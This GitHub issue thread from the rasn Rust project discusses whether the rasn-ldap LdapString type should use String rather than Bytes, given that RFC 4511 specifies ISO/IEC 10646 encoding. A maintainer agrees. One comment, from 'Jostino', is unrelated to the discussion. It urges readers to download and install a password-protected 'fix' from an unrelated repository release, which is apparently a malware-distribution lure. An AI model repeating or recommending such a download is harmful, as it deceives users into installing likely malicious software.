### ISSUE TITLE
Should `rasn-ldap` `LdapString` types actually use `String` instead of `Bytes`?

### ISSUE THREAD

**Issue by repnop** [librasn/rasn#304]
so while reading through the [LDAP RFC](https://datatracker.ietf.org/doc/html/rfc4511#section-4.1.2), I noticed that it mentioned that the `LDAPString` type is encoded as ISO/IEC 10646 which it calls a "superset" of Unicode, however, if we go to the [Unicode FAQ page](https://www.unicode.org/faq/unicode_iso.html) for this, it says:

> Q: What are the differences between ISO/IEC 10646 and Unicode?
> 
> While the character codes and [encoding forms](https://www.unicode.org/glossary/#encoding_form) are synchronized between Unicode and ISO/IEC 10646, the [Unicode Standard](https://www.unicode.org/glossary/#unicode_standard) imposes additional constraints on implementations to ensure that they treat characters uniformly across platforms and applications. To this end, it supplies an extensive set of functional character specifications, character data, [algorithms](https://www.unicode.org/glossary/#algorithm) and substantial background material that is not part of ISO/IEC 10646.

this, to me, says that it would be fine to use `String` instead of whatever backing type for `OCTET STRING` since the code points are defined to be exactly the same, but Unicode _also_ defines algorithms and normalization methods for working with Unicode text, which is orthogonal to the encoding itself, hence the representations, as far as the Rust `String` type is concerned, are equivalent. this would make working with LDAP types much easier, since you would not need to check if the contents are UTF-8 encoded every time you want to get a `&str` or `String` out of them.

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by XAMPPRocky** [comment]
Thank you for your issue! Yes, I think that probably makes the most sense given the information you've provided. If someone wants to create a PR for this, I'm more than happy to review it.
